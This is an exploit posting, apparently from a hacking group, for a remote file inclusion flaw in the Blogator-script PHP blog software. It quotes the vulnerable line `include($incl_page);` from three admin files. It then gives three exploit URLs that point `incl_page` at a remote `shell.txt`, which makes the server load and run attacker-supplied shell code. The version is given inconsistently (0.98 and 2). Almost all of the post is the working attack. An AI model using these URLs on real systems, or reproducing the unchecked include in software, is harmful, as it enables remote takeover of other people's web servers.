Blogator-script version 0.98 suffers from a remote file inclusion vulnerability.
1bcc8d033a4d8351d9fb02fce8c59219fbad029e8f5f9e1fc72c9c8942e74c83
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] ---
-------------------------------------------------------------------------
# Author : jiko
# email : jalikom@hotmail.com
# Home : www.no-back.org
# Script : Blogator-script Version 2
# Bug : Remote File Inclusion
# Download : http://www.blogator-script.com/telecharger.php
# file : struct_admin.php & struct_admin_blog.php & struct_main.php
# Eror :
<? include($incl_page); ?>
=========================JIkI Team===================
# Exploit :
http://localhost/[script]/_blogadata/include/struct_admin.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_admin_blog.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://localhost/shell.txt?
=========================JIKI Team===================
greetz : all my friend and H-T Team
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] --
-------------------------------------------------------------------------